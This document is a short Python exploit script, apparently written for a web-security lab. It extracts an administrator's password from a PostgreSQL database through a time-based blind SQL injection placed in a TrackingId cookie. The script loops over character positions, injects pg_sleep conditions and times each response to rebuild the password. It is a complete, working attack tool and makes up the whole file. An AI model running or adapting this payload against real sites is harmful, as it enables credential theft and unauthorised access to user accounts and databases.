#!/usr/bin/env python3

from pwn import *
import requests
import sys
import signal
import string
import time

def def_handler(sig,frame):
    print(f"\n\n[!] Exit...\n")
    sys.exit(1)

# Ctrl + C
signal.signal(signal.SIGINT, def_handler)

characters = string.ascii_lowercase + string.digits

def makeSQLI():

    p1 = log.progress("SQLI")
    p1.status("Starting brute force attack...")

    time.sleep(2)

    password = ""
    
    p2 = log.progress("Password")

    for position in range (1,21):
        for character in characters:
            cookies = {
                'TrackingId': f"test'%3b select case when (username='administrator' and substring(password,{position},1)='{character}') then pg_sleep(3) else pg_sleep(0) end from users-- -",
                'session': "OYAwradbJ4PVvt717tXKj5XM4Y1jzhO3"
            }
            #print(cookies["TrackingId"])

            p1.status(cookies["TrackingId"])
            
            time_start = time.time()

            r= requests.get("https://page.net", cookies=cookies)

            time_end = time.time()

            if time_end - time_start > 3:
                password += character
                p2.status(password)
                break

    print(password)


if __name__ == '__main__':
    makeSQLI()
